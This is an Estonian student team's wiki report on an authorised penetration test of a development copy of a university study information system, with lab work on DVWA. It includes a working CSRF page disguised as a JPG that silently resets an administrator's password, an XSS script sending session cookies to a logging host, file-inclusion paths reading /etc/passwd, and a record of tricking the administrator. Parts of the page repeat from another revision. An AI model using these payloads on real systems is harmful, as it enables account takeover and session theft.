Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
:Alo Konno A21
:Urmo Lihten A21
:Taavi Podžuks A22
:Matis Alliksoo A22
:Sander Saarm A22

== Juhendajad ==
Täname oma juhendajaid:
:Mart Mangus
:Margus Ernits
:Valter Kungla

Security team

2012-03-30T21:06:40Z

Ulihten: /* Fireforce plugin Firefoxis */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

::A1: Injection - Urmo
::A2: Cross-Site Scripting (XSS) - Alo
::A3: Broken Authentication and Session Management - Sander
::A4: Insecure Direct Object References - Alo
::A5: Cross-Site Request Forgery (CSRF) - Taavi
::A6: Security Misconfiguration - Matis
::A7: Insecure Cryptographic Storage - Matis
::A8: Failure to Restrict URL Access - Urmo
::A9: Insufficient Transport Layer Protection - Taavi
::A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
:1.1 Tutvuda OWASP’iga.
:1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
:1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
:2.1 Esitada tiimi tegevusplaan.
:2.2 Tutvuda turvariskidega natuke põhjalikumalt.
:2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
:2.4 Täiendada esimese päeva ettekannet.
3. Päev
:3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
:3.2 Saadud tulemuste dokumenteerimine.
4. Päev
:4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
:5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
:Cross-Site Scripting (XSS)
:SQL Injection (blind test)
:File inclusion
:Code Execution
:LDAP Injection
:Cross Frame Scripting
:SQL Injection (error msg. test)
:CRLF Injection
:Directory Travelsal
:XPath Injection
:URL Redirection
:Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.

Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".

Määrata ära tuli ka, et mitu päringut sekundis tehakse.

Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.

Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.

Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
